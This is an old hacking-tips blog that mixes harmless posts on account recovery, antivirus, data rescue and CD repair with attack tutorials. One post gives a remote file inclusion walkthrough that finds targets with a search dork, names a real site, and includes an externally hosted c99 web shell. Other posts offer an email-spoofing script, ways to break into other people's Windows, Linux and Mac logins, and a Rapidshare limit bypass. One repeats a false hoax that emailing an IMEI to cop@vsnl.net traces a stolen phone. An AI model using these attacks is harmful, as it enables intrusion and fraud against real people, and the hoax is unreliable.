Monstro-Piratage

How to Recover Hacked Email Accounts?

2011-03-15T09:00:00.000-07:00

It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out. In this post you will find the possible ways and procedures to get back your hacked email account.

For Gmail:

It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try.

Step -1: Try resetting your password since it is the easiest way to get your account back in action. In this process Google may ask you to answer the secret question or may send the password reset details to the secondary email address associated with your compromised account. You can reset you password from the following link

Gmail Password Reset Link

If you cannot find success from the Step-1 then proceed to Step-2.

Step-2: Many times the hacker will change the secret question and secondary email address right after the account is compromised. This is the reason for the Password Reset process to fail. If this is the case then you need to contact the Gmail support team by filling out the account recovery form. This form will ask you to fill out several questions like

1. Email addresses of up to five frequently emailed contacts
2. Names of any 4 Labels that you may have created in your account
3. List of other services associated with your compromised account
4. Your last successful login date
5. Account created date
6. Last password that you remember and many more…

You need to fill out this form as much accurately as possible. It is obvious to forget the dates of last login, account creation and similar terms. However you need to figure out the closest possible date/answers and fill out this form. This is your last chance! The more accurate the information filled out in the recovery form, the more the chances of getting your account back. You may reach the account recovery page form the following link

Account Recovery Form

For Yahoo and Hotmail:

Unfortunately for Yahoo/Hotmail there is no second option like filling out the form or contacting the support team. All you need to do is either answer the secret questions that you have setup or reset the password using the secondary email option.

To initiate the password reset process just click on the Forgot password link in your login page and proceed as per the screen instructions.

Send Fake Email-PRANKS

2011-03-15T08:49:00.000-07:00

Most of us are very curious to know a method to send anonymous emails to our friends for fun. But the question is, is it possible to send anonymous emails in spite of the advanced spam filtering technology adopted by email service provides like Gmail, Yahoo etc? The answer is YES, it is still possible to bypass their spam filters and send anonymous emails to your friends. For example, you can send an email to your friend with the following sender details.

From: Bill Gates <billg@microsoft.com>

If you have to successfully send an anonymous email or spoofed email, you should send it using a relay server.

What is a Relay Server?
In simple words, a relay server is an SMTP Server that is trusted by Google or Yahoo as an authorised sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorised, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason for which using our own SMTP server to send emails fail.

So What’s Next?
Now all we have to do is, find a trusted SMTP server to Send Spoofed Emails. Usually all the emails that are sent from web hosting providers are trusted and authorised. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free Web Hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it’s just a cakewalk to send anonymous emails. All we have to do is just modify the email headers to insert the spoofed From address field into it.
I have created a PHP script that allows you to send emails from any name and email address of your choice. Here is a step-by-step procedure to setup your own Anonymous Email Sender Script

1. Goto X10 Hosting and register a new account.
2. Download my Anonymous Email Sender Script (sendmail.rar).
3. Login to your FreeWebHostingArea Account and click on File Manager.
4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.
5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.
6. Now type the following URL

http://yoursite.x10hosting.com/sendmail.php

NOTE: yoursite must be substituted by the name of the subdomain that you have chosen during the registration process.

7. Use the script to send Anonymous Emails. Enjoy!!!

How Antivirus Software Works

2011-03-15T08:45:00.001-07:00

An antivirus software typically uses a variety of strategies in detecting and removing viruses, worms and other malware programs. The following are the two most widely employed identification methods:

1. Signature-based dectection (Dictionary approach)

This is the most commonly employed method which involves searching for known patterns of virus within a given file. Every antivirus software will have a dictionary of sample malware codes called signatures in it’s database. Whenever a file is examined, the antivirus refers to the dictionary of sample codes present within it’s database and compares the same with the current file. If the piece of code within the file matches with the one in it’s dictionary then it is flagged and proper action is taken immediately so as to stop the virus from further replicating. The antivirus may choose to repair the file, quarantine or delete it permanently based on it’s potential risk.

As new viruses and malwares are created and released every day, this method of detection cannot defend against new malwares unless their samples are collected and signatures are released by the antivirus software company. Some companies may also encourage the users to upload new viruses or variants, so that the virus can be analyzed and the signature can be added to the dictionary.

Signature based detection can be very effective, but requires frequent updates of the virus signature dictionary. Hence the users must update their antivirus software on a regular basis so as to defend against new threats that are released daily.

2. Heuristic-based detection (Suspicious behaviour approach)

Heuristic-based detection involves identifying suspicious behaviour from any given program which might indicate a potential risk. This approach is used by some of the sophisticated antivirus softwares to identify new malware and variants of known malware. Unlike the signature based approach, here the antivirus doesn’t attempt to identify known viruses, but instead monitors the behavior of all programs.

For example, malicious behaviours like a program trying to write data to an executable program is flagged and the user is alerted about this action. This method of detection gives an additional level of security from unidentified threats.

File emulation: This is another type of heuristic-based approach where a given program is executed in a virtual environment and the actions performed by it are logged. Based on the actions logged, the antivirus software can determine if the program is malicious or not and carry out necessary actions in order to clean the infection.

Most commercial antivirus softwares use a combination of both signature-based and heuristic-based approaches to combat malware.

Issues of concern

Zero-day threats: A zero-day (zero-hour ) threat or attack is where a malware tries to exploit computer application vulnerabilities that are yet unidentified by the antivirus software companies. These attacks are used to cause damage to the computer even before they are identified. Since patches are not yet released for these kind of new threats, they can easily manage to bypass the antivirus software and carry out malicious actions. However most of the threats are identified after a day or two of it’s release, but damage caused by them before identification is quite inevitable.

Daily Updates: Since new viruses and threats are released everyday, it is most essential to update the antivirus software so as to keep the virus definitions up-to-date. Most softwares will have an auto-update feature so that the virus definitions are updated whenever the computer is connected to the Internet.

Effectiveness: Even though an antivirus software can catch almost every malware, it is still not 100% foolproof against all kinds of threats. As explained earlier, a zero-day threat can easily bypass the protective shield of the antivirus software. Also virus authors have tried to stay a step ahead by writing “oligomorphic“, “polymorphic” and, more recently, “metamorphic” virus codes, which will encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as to not match virus signatures in the dictionary.

Thus user education is as important as antivirus software; users must be trained to practice safe surfing habits such as downloading files only from trusted websites and not blindly executing a program that is unknown or obtained from an untrusted source. I hope this article will help you understand the working of an antivirus software.

Tips to Avoid Facebook Viruses and Spam

2011-03-09T08:54:00.001-08:00

Facebook, the biggest social network with 500 million users, provides an interface to hit an unsuspecting crowd with malware and viruses. These viruses aren’t very difficult to detect if you are cautious enough. These Facebook viruses appear on your wall in forms of a bizarre or eye-catching stories and videos and once the user has clicked/liked the link, it is already late. The next step will be getting rid of your Facebook virus which is a time-consuming process. Its better to avoid spam messages and trojan viruses in the first place.
How to avoid it?

1. Think before you Act. Viruses on Facebook are sneaky. The hackers and cybercriminals who want your information know that Facebook users will often click on an interesting post without a moment’s thought. If a post sounds a bit over-the-top like a headline out of a tabloid, this is your first warning sign.

2. Try to avoid Links and videos with Catchy words like “funniest ever,” “most hilarious video on Facebook,” or “you’ve got to see this.” Do some keyword research to see if the post in question comes up in a search engine with information about a current virus or trojan.

3. Check the poster of the Suspicious content. If you receive a message from someone you do not know, this is an obvious red flag. Facebook video viruses also tend to pop up in your news feed or on your wall from friends you haven’t talked to in a while. Unfortunately, it’s likely this friend has already fallen victim to the latest virus on Facebook. After clicking on the story themselves, the message was sent out to all of their friends as well.

4 Avoid messages that have been posted by multiple users as the virus spreads among your friends who were not so cautious. If a link with title such as “Sexiest video ever” shows up all over your feed from all kinds of people (perhaps friends you would not expect to make such a post), this is another warning sign. Similar direct messages are a likely variant of the notorious Facebook Koobface virus which has used this approach in the past.

5. Do not fall for the “typical” money-transfer schemes. Chat messages from friends needing funds will usually sound suspicious. Everything can’t be screened before posting, so money transfer scams and hoax applications still find their way on to Facebook. You should also avoid applications that claim to do a full “Error check” or fix security problems related to your profile.

6. Update your anti-virus software frequently. If you do accidentally click on a post before realizing it is a hoax, do not click on any further links or downloads. If it’s too late and you have already been infected, the Facebook virus removal process may be effortless if you have a good anti-virus program to catch the virus, trojan or other malware early on.
What’s Next?

These were few important tips to safeguard your facebook account but your job isn’t done yet. Once you have detected that the link/post on your facebook wall is Malicious you should Mark it as SPAM so that the facebook support will stop it from spreading further and infecting other users.

If you have ever fallen victim of any such Malicious Scheme, please share your experience with all the users in form of comments so that others don’t fall victim of it.

Get rid of the Blue screen of Death

2010-09-23T06:38:00.001-07:00

Yes friends I have got a solution for the blue screen of death and from now you may never see the blue screen of death on your computer.

AntiCrash is a program that can intercept and fix up to 95.8% crashes, errors, freezes and blue screens. When a crash occurs, AntiCrash fixes it automatically; you have nothing to do!

New! AntiCrash now also includes a unique technology, AutoRepair. With AutoRepair, you scan & repair all your computer problems with a single click. AutoRepair automatically determines what is wrong on your computer with an advanced Artificial Intelligence system, and fixes it instantly.

AntiCrash will protect your computer like no other software. Not only AntiCrash protects you against 95.8% crashes, but it also automatically fixes the crashes; you don’t have to do anything, AntiCrash does all the work for you! AntiCrash is also the only software capable of intercepting blue screens and freezes.

To Download the software click here.

Password : www.hungry-hackers.com

How to Hack Password of any Operating System

2010-09-23T06:37:00.001-07:00

One thing any hacker should know is how to hack into login account of any operating system. Major Operating Systems that are used these days are Windows, Linux and Mac. So today I will show you how to hack into these Operating Systems. Are you curious how easy it is for someone to gain access to your computer? If so, read on to see the technique one might use to figure out your computer password.
Windows

Windows being very popular has a lot of programs available which can be used to hack the login password. One of the most successful program is Ophcrack, and it is free. Ophcrack is based on Slackware, and uses rainbow tables to solve passwords up to 14 characters in length. The time required to solve a password? Generally 10 seconds. The expertise needed? None.

Simply download the Ophcrack ISO and burn it to a CD (or load it onto a USB drive via UNetbootin). Insert the CD into a machine you would like to gain access to, then press and hold the power button until the computer shuts down. Turn the computer back on and enter BIOS at startup. Change the boot sequence to CD before HDD, then save and exit.

The computer will restart and Ophcrack will be loaded. Sit back and watch as it does all the work for your. Write down the password it gives you, remove the disc, restart the computer, and log in as if it were you own machine.

You can download OphCrack from the following link:

http://ophcrack.sourceforge.net/

Linux

Linux is an operating system which is quickly gaining popularity in mainstream, but not so common that you’re likely to come across it. Though Mac and Linux are both based on Unix, it is easier to change the password in Linux than it is OS X.

To change the password, turn on the computer and press the ESC key when GRUB appears. Scroll down and highlight ‘Recovery Mode’ and press the ‘B’ key; this will cause you to enter ‘Single User Mode’.

You’re now at the prompt, and logged in as ‘root’ by default. Type ‘passwd’ and then choose a new password. This will change the root password to whatever you enter. If you’re interested in only gaining access to a single account on the system, however, then type ‘passwd username’ replacing ‘username’ with the login name for the account you would like to alter the password for.
Mac

Finally we take on Mac’s OS X which as we said earlier is based on Unix and is difficult to change password compared to Linux but nothing is impossible to be hacked.

The easiest method would be to use Ophcrack on this also as it works with Mac and Linux in addition to Windows. However, there are other methods that can be used, as demonstrated below.

If the Mac runs OS X 10.4, then you only need the installation CD. Insert it into the computer, reboot. When it starts up, select UTILITIES > RESET PASSWORD. Choose a new password and then use that to log in.

If the Mac runs OS X 10.5, restart the computer and press COMMAND + S. When at the prompt, type:

fsck -fy

mount -uw /

launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist

dscl . -passwd /Users/UserName newpassword

That’s it. Now that the password is reset, you can login.

How to Recover Important Data after your System is Crashed

2010-09-02T06:19:00.000-07:00

Suppose your computer commits suicide by inviting the latest virus and you are not able to get it back up and running. As a last resort you decide to backup your important documents, photos that you took of your girl friend and the ASCII text file containing your passwords. Today I will show how to do this very easily.

Create a System Rescue CD

Use an uninfected computer and download the System Rescue CD ISO file (latest version) from sysresccd.org. Now burn this ISO to a blank CD.
Start the rescue

After the ISO is written to CD, take it out, pop the CD into the drive of the computer that’s busted. Set the BIOS to boot through the CD first, hard disk next. And allow it to reboot.

You should see this beautiful System Rescue startup screen. Type these options after the boot: prompt and press ENTER.

rescuecd docache dostartx dodhcp

The docache option allows you to remove the System Rescue CD after it boots up, so you can enter another blank CD/DVD and take backups.

The dostartx option starts GUI automatically.

The dodhcp opiton automatically configures the network and connects you automatically to the Internet after booting.

Load the appropriate keymap when prompted (or just select the default US keymap).

It should start GUI automatically. In case it doesn’t, type startx at the command line and press ENTER.

Your desktop should have a terminal with a yellow background. We need to mount the partition and then do the backup.

Your Windows partition will most likely be located in /mnt/sda1 or /mnt/sda2. To check the partitions, run this:

fdisk -l /dev/sda

It should show you the partition names.

Then, to mount partition 1, run this:

ntfs-3g /mnt/sda1 /mnt/windows

If it mounts correctly, you should be able to see the files in your C:\ directory when you type:

ls -al /mnt/windows

Backing up your data to a CD/DVD

Now, to begin backing up your data, type this:

xfburn

The Xfburn program will show you a list of your partitions. Browse to the Windows partition(s) using the Filesystem menu option on the top-left and select all the files you need. Click on New Data Composition. Insert a blank CD or DVD and allow to burn all your data to the CD/DVD.
Backing up your data to a remote location

This is easier if you love using the command line. First, make sure the network is up by pinging to google.com

ping google.com

If it throws up an error, you have to run this to configure your network interface:

net-setup eth0

If you want to transfer the files in the directory C:\work to your remote server myremoteserver.com as user hungryhackers

The directory C:\work would be located in /mnt/windows/work. This command will transfer the directory:

scp -r /mnt/windows/work hungryhackers@myremoteserver.com

Enter the password for user hungryhackers and the file transfer will begin.

Awesome + Resourceful Web Portals

2010-09-02T06:11:00.000-07:00

Check out the following Microsoft Web portals that caters to need of almost everyone. The Portal name is followed by a brief description.

1.

Webspark

: It’s for small IT enterprises. Microsoft provides them the tools needed for Designing and development for FREE!. There is no upfront cost for first 3 years. Terms and conditions do apply, but they seem to be obvious For eg : You need to deploy a website before 6 months, renew your subscription after few months, etc. Above all, it is for all budding webmasters!

2.

Bizspark

: To me, bizspark.com is extension of websitespark.com. Fundamentally it is for Tech startup’s that need support and visibility. This one is meant for all techno-preneurs!

3.

Dream Spark

FREE software’s ( like Visual Studio professional! ) for students.

4.

Microsoft Student to Business

: To bridge the gap between Industry requirements and Student’s knowledge. The website has list of Job and Internship openings of various tech firms. it’s for all those who dream to be corporate czars!

Thanks 4 Reading

Seven Steps to become a world class computer Engineer

2010-09-02T06:04:00.000-07:00

Reasons for writing this post:

* I feel I have not done enough to become a good computer engineer. May be I did not have someone who could guide me properly. We were only the second batch of Computer Engineering at Nirma Institute of Technology, Ahmedabad, so we had no mentors in the industry.
* Second reason, may be we were not mature enough.
* Third reason, 3 Idiots was not released at that time.
* So this post is dedicated to all the fellow computer engineering students (especially in India) who are still having a good time by bunking the classes but not doing good enough to become a world class computer engineer otherwise.

But what can I do?

1. Have the right infrastructure

* Get yourself a decent laptop. (I prefer Mac but any decent Dell laptop is also ok)
* Get yourself a nice internet connection with highest speed available. (Take a cut from your pocket money if you have to but this is a must)
* Get yourself an iPhone (I know it is expensive in India but you will have to use world class gadgets to become world class engineer)
* Make your home or hostel room WiFi enabled. (This is not expensive. You will get a decent router in 2-3k.)
* If you are not able to do any or all of the above things, don’t worry you can still become a good computer engineer. So hang on and keep reading.

2. Learn to use Google Reader

* Google reader will become the best companion of yours for lifetime if you use it properly.
* It is nothing but a cool RSS reader from Google using which you can subscribe to blogs to get latest updates and posts. So if you have a gmail account you are ready to go. What? You do not have a gmail account yet!! Go get one right now. Stop reading. Open a gmail account now and come back. I am waiting.
* I am still waiting.
* Ok great, so you have a gmail account now, good. Watch this video . It explains in plain english how to use google reader.
View This video for Google reader In plain english
How?

* Software, Web Search Strategies, Wikis, Social Bookmarking, Social Networking, Blogs, Podcasting and Cloud computing on http://www.commoncraft.com/ (Now you understand why I told you get the fastest internet connection available?). You don’t have to see them all at once but do check them all and understand.
* Done? Ok so you are ready to become a world class computer engineer now.
* Now you understand Google Reader, so it’s time to subscribe to interesting blogs. Subscribe to following blogs.
o Techcrunch.com (King of Technology Blogs)
o Gigaom.com (Michale Arrington of Techcrunch considers Om as his Guru)
o ReadWriteWeb.com
o Pluggd.in (Indian Techcrunch)
o JoelOnSoftware.com (a must read for programmers)
o CodingHorror.com (another must read for programmers)
* There are many such blogs but to start with these are ok. You will keep finding other interesting blogs as and when you will come across some.
* Getting used to read on computer takes time and patience so just keep reading it.
* So I guess we are done with Google Reader part here. This means you have to open up Google Reader as soon you bunk the classes or as soon as you get the time to check your mails.

3. Academic Earth

* Do you want to see how professors teach in Harvard and Stanford? Do you want to see how their lectures are conducted? You can now, we were not able to do that in our time.
* Go to www.academicearth.org and you will see videos of actual lectures and courses of Harvard, Yale, Stanford. Now you know whose lectures to watch after bunking the classes or after getting back to home.
* You do not want to miss the chance of studying in these universities without going to US to giving them millions in fees right? and guess what? Attendance is not compulsory here :)

4. Learn any web language quickly and start building

* I would suggest PHP or Ruby. ASP.NET C# is also fine if you already know something about it.
* And start building something on it. It can be anything. But start programming on web now. Most of you are never going to write a program C, C++ or COBOL in your lifetime. I would not advise against learning them though.
* After you know something about web programming, read “Getting Real” from 37Signals.
* Now again build something using whatever you learned from the above book.

5. Assume you are in Sillicon Valley

* I know this sounds little weird but that’s the way it is.
* The best of the minds in the world are there and you do not want to miss out on that right?
* Thousands of things happen everyday in Sillicon Valley and you can remain updated by reading above blogs I mentioned.
* So start feeling the air :)

6. Start asking why?

* When you are attending a lecture or reading anything, have a habit of asking why?
* For e.g. Why we have to study “Strength of Materials” when most of us are going to write web applications in PHP or ASP.NET?
* When you ask why often, you start understanding the logic, the reason behind doing anything.
* Same as they have said in 3 Idiots, don’t learn to get marks but learn to know something, to achieve the excellence. When you start asking why, you start on the right path.

7. Understand computer hardware

* Most people thinks this is boring and unnecessary.
* May be it is, but it will certainly make you better programmer, even if you will never touch the inside of the computer again.
* Basic understanding of hardware is necessary to understand how computer works.
* You have to understand following 100% without any doubt in your mind.
o How your high level programming code becomes 0s and 1s and execute?
o The text which you are reading now is also consisting of 0s and 1s only then how come you are reading the alphabets here?
o FYI I am still not 100% clear on this. But I will be one day. Till then I am not a good computer engineer.

I guess I have get you started here.

By following any or all of the above steps you are destined to become world class computer engineer. By no means I am asking you to stop whatever you are doing right now in your college.
These are additional things you have to do. It takes hard work to become world class right?

You are always on your own to achieve the path of excellence. Friends and Tutors can only guide you, they can not make you one.

I would request my fellow classmates to add points in this post. I believe our batch 99CE in Nirma Institue of Technology had one of the best and brightest minds in the world. Do you have any doubt? Well this guy is one of them. 99CE people are in MIT, Google, Apple, Barclays, Bank of America to name a few. They are spread across the world and are on their way to become future leaders.

I would also request people who have read this post and feel they can add something here to help students of computer engineering. My aim is to have great people coming out of Indian Engineering Colleges.

Last words, by no means above list is exhaustive and complete. There are “n” number of ways to achieve excellence. These are my personal views and I have learned them long and hard way. I hope to make your journey little easier by this post.

Hack a Website Using Remote File Inclusion

2010-09-02T05:53:00.000-07:00

Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.

Searching the Vulnerability

Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one

www.Targetsite.com/index.php?page=Anything

To find the vulnerability the hacker will most commonly use the following Google Dork

“inurl:index.php?page=”

This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

www.targetsite.com/index.php?page=www.google.com

Lets say that the target website is http://www.cbspk.com

So the hacker url will become

http://www.cbspk.com/v2/index.php?page=http://www.google.com

If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829

The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.

Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is

http://h1.ripway.com/rafaybaloch/c99.txt

Now here is how a hacker would execute the following command to gain access

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt?

Remember to add “?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it

Track your lost mobile

2010-09-02T05:49:00.000-07:00

Did you ever lost your mobile and found no help from police or mobile operator in tracking your mobile? Well now you don’t need to be worried about it. Now a days each one of us carry Mobile devices and always fear that it may be stolen. Each mobile carries a unique IMEI i.e International Mobile Identity No which can be used to track your mobile anywhere in the world.

This is how it works!!!!!!

1. Dial *#06# from your mobile.
2. Your mobile shows a unique 15 digit .
3. Note down this no anywhere but except your mobile as this is the no which will help trace your mobile in case of a theft.
4. Once stolen you just have to mail this 15 digit IMEI no. to cop@vsnl.net
5. No need to go to police.
6. Your Mobile will be traced within next 24 hrs via a complex system of GPRS and internet.
7. You will find where your hand set is being operated even in case your no is being changed.

PASS ON THIS VERY IMP MESSAGE TO ALL YOUR FRIENDS AND RELATIVES.

If u lost your mobile, send an e-mail to cop@vsnl.netwith the following info.
Your name:
Address:
Phone model:
Make:
Last used No.:
E-mail for communication:
Missed date:
IMEI No.:

Hack Twitter Using Twitter Bot

2010-07-07T22:11:00.000-07:00

Twitter is becoming an important marketing tool for online publishers and marketers. But it can be time consuming to keep your profile up to date and it often gets forgotten. I guess Everybody is waiting for a Solution. So Today I will give you a software
which will automate all your twitter tasks.

Twitter Bot can do a lot of amazing things without any need of User Intervention thats why it is called a Bot. Why one should have this software? I would say checkout the functions of this software and you will get your answer.
Features

1. Auto add followers: The twitter bot will add 500 new friends on a daily basis. Many of those follower may follow you in return.

2. Auto Unfollow those who are not following you: It will automatically unfollow those who are not following you.

3. Auto Follow those who follow you: You can return favor to your followers by following them and that by a click of a button

4. Follow Top 100 People from your Country: You can target users from a particular Country based on Time Zones

5. Auto Follow By Keyword Search: You can target user based on Specific Keywords.

6. Auto Update your status: You can update your status every X minutes and these Updates will be fetched from a Text File.

7. Auto reply: You can set a Message which will be replied automatically on arrival of a message.

8. Multiple accounts handling: You can handle multiple Accounts. Twitter Bot can handle all of them in the background doing all the functions.

9. Works with proxies or Real IP: The twitter bot can run behind proxies. You set a text file with a list of proxies in format IP:Port (ex. 123.123.123.123:80) and the twitter bot will first check to see which of them are working, and then it will use the working ones to login to your accounts and do the functions that you neet it to do.

10. Extract and import your followers: You can extract the list of followers into XML or Text file.

11. Schedule Messages: You can schedule the Bot to Update your Twitter status on a Specified Date and Time.

12. Reply based on Keywords: You can set the Bot to reply based on the Keyword found in arrived Message.
Conclusion

After mentioning all these features I don’t need to say much about this Software. I would say just go and grab this software.
Download

To get your copy of Twitter Bot Click Here

How to Uninstall Ghosted Devices from Windows

2010-07-07T22:10:00.001-07:00

Do you know that your computer can be full of Ghosted Devices? And like Humans are scared of real world Ghosts your Computer is also scared of these Virtual Ghosts. Presence of such ghosts causes deterioration in the Startup Speed and Overall Computer speed.

In simple language Ghosted Devices, commonly known as Hidden Devices, are those devices that were once connected to the system but are no longer connected. Windows however keeps a copy of them inside the Device Manager and tries to find these devices on system startup, thus reducing the startup speed(often negligible) in some cases.

As an example, lets consider a mouse that you borrowed from a friend, after using it you returned him the next day. When it was first connected, Windows installed the required drivers and when it was removed, Windows marked it as ‘Ghosted Device’. Now since you will probably never use this mouse again, it makes sense to remove it.

The common way of removing the device is to go to Device Manager, view hidden devices, right-click the device(s), hit Uninstall, and wait. Since it can be confusing at some times, this is where GhostBuster comes in. It is a portable tool that can list all Ghosted and Normal devices in one simple list and allows you to remove them in one click.
Please note that these “Ghosted Devices” can be useful as well and is one reason why Windows never looks for drivers every time you connect the device.

Suppose you connect a mouse after a few months after borrowing from a another friend and it turns out to be the same mouse that you borrowed from a friend before. Upon connecting it, you will be able to use the mouse instantly since Windows will not need to re-install the drivers. In layman’s term, the Ghosted device will become activated instantly and thus will not require driver installation again.

Note: Windows has some devices that are ghosted but should NEVER be removed(like devices in the sound, video and game controller class or system and non plug-n-play devices), GhostBuster marks them down as services. Make sure you know which device you are removing, consider this a warning.

It works on Windows XP, Windows Vista, and Windows 7. If you are using Vista or 7, go to Properties and run it in Windows XP compatibility mode.

How to Recover Important Data after your System is Crashed

2010-07-07T22:08:00.000-07:00

Suppose your computer commits suicide by inviting the latest virus and you are not able to get it back up and running. As a last resort you decide to backup your important documents, photos that you took of your girl friend and the ASCII text file containing your passwords. Today I will show how to do this very easily.
Create a System Rescue CD

Use an uninfected computer and download the System Rescue CD ISO file (latest version) from sysresccd.org. Now burn this ISO to a blank CD.
Start the rescue

After the ISO is written to CD, take it out, pop the CD into the drive of the computer that’s busted. Set the BIOS to boot through the CD first, hard disk next. And allow it to reboot.

You should see this beautiful System Rescue startup screen. Type these options after the boot: prompt and press ENTER.

rescuecd docache dostartx dodhcp

The docache option allows you to remove the System Rescue CD after it boots up, so you can enter another blank CD/DVD and take backups.

The dostartx option starts GUI automatically.

The dodhcp opiton automatically configures the network and connects you automatically to the Internet after booting.

Load the appropriate keymap when prompted (or just select the default US keymap).

It should start GUI automatically. In case it doesn’t, type startx at the command line and press ENTER.

Your desktop should have a terminal with a yellow background. We need to mount the partition and then do the backup.

Your Windows partition will most likely be located in /mnt/sda1 or /mnt/sda2. To check the partitions, run this:

fdisk -l /dev/sda

It should show you the partition names.

Then, to mount partition 1, run this:

ntfs-3g /mnt/sda1 /mnt/windows

If it mounts correctly, you should be able to see the files in your C:\ directory when you type:

ls -al /mnt/windows

Backing up your data to a CD/DVD

Now, to begin backing up your data, type this:

xfburn

The Xfburn program will show you a list of your partitions. Browse to the Windows partition(s) using the Filesystem menu option on the top-left and select all the files you need. Click on New Data Composition. Insert a blank CD or DVD and allow to burn all your data to the CD/DVD.
Backing up your data to a remote location

This is easier if you love using the command line. First, make sure the network is up by pinging to google.com

ping google.com

If it throws up an error, you have to run this to configure your network interface:

net-setup eth0

If you want to transfer the files in the directory C:\work to your remote server myremoteserver.com as user hungryhackers

The directory C:\work would be located in /mnt/windows/work. This command will transfer the directory:

scp -r /mnt/windows/work hungryhackers@myremoteserver.com

How to view Removed Videos on Youtube

2010-07-07T22:07:00.000-07:00

Hello Friends,

Have you ever found an Interesting Video on Youtube but when you try to view that video you find out that the video has been removed by Youtube due to terms of Use Violation. According to the policy of Youtube, it has a right to remove any video from public viewing if it is found to be violating the terms and conditions of Youtube.

ut now I will show you how to view that video.

Just follow the steps given bellow and watch your favorite videos:

* Go to the page where you got the error message that this video has been removed.
* Next click on the Video’s Publisher, that is- the Uploader of that video.
* It should show you the uploader’s video uploads in the right.
* Find the Video which he uploaded and is now removed
* Click on it
* Hurray! You have got access to watch the removed Video
* Now Sometimes you can open the video in New Tab and it wont show the message that the video is removed due to violating the terms.. Sometimes it may show..

How to Hack Rapidshare.com

2010-07-07T22:04:00.000-07:00

Since I started blogging the question that has been asked by maximum number of users via Comments, Web Forms or via Communities is “How to hack Rapidshare.com?”.

Rapidshare is one of the best file hosting service in the world. You can upload, Download files that you want very easily. But if you are not a premium user of
Rapidshare then while downloading any file from the rapidshare, you will get annoying download time before getting the download link.

Today I am posting the answer to your most asked question via a very simple trick which will help you to reset the download waiting time to zero. So you can download your files very quickly.

Follow the steps given below and hack Rapidshare.com yourself:

1. Goto the Rapidshare URL of the file you want to Download.
2. Now click on the Free User button. Your waiting time will be start.

3. Now remove the current URL and copy the follwing code in the Browser’s address bar;
javascript:alert(c=0)
4. Hit Enter.

5. This code will set your download timer as zero and download link will be appear immediately.

6. Click Download. If it gives some error message, refresh the page once and download will start.

You could also add the following link to bookmarklets and use it whenever you want to circumvent Rapidshare Wait Time.

Recovering Scratched CD's

2010-04-30T08:35:00.000-07:00

Here's an easy home remedy, which might give you the desired results. Rub a small amount of toothpaste on the scratch and polish the CD with a soft cloth and any petroleum-based polishing solution (like clear shoe polish). Squirt a drop of Brasso and wipe it with a clean cloth.
Technology to the rescue:
There are many softwares available on the net, which enable the recovery of the CD data. BadCopy Pro is one such software, which can be used to recover destroyed data and files from a range of media.
Just a few clicks is all it requires to recover the disc from almost all kind of damage situation; be it corrupted, lost data, unreadable or defective.
DiskDoctors is another popular company, which offers both software and solutions to recover data from a scratched CDs and DVDs
General Tips:

* Always wipe the CD from the center outward with straight spoke-like strokes. Wiping CDs in circles will create more scratches.
* Do not scratch the graphics layer as you cannot repair the disc.
HINT: Hold the disc up to a light with the graphics layer facing the light source. If you can see light thru the scratches at any point then the disc may be irreparable and or exhibit loading or playing errors.
* Clean your Disc players lens regularly with a suitable product to ensure optimal viewing pleasure.
* Make sure to use a soft, lint-free cloth to clean both sides of the disc. Wipe in a straight line from the centre of the disc to the outer edge.
* If wiping with a cloth does not remove a fingerprint or smudge, use a specialized DVD disc polishing spray to clean the disc.

Hide Your Files In A JPEG

2010-04-30T08:33:00.000-07:00

Ok, lets begin…

1. Gather all the files that you wish to hide in a folder anywhere in your PC(make it in C:\hidden - RECOMMENDED).
2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).
3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.
4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.
5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture

# you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both. :D
# Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive...

This hack will allow you to hide files in jpegs's without software installed.

Resolve “Setup did not find any hard disks drive” error

2010-04-30T08:14:00.000-07:00

One of the most popular topics among our readers is installing Windows XP on your new Windows Vista computer - sometimes for compatibility reasons, but also because a lot of people just don't like Vista very much.

The problem that people keep running into left and right is getting to the point where XP starts to install and getting the message "Setup did not find any hard disk drives installed in your computer". This error happens because your new computer has a storage controller that isn't supported natively in XP, usually an SATA (Serial ATA) controller.

If you don't have a floppy drive in your computer (who does anymore), then you'll need to use a process called slip-streaming to integrate the storage drivers into your XP installation CD.

It should go without saying that this is an advanced topic, so proceed with caution.

Creating a Custom XP Install

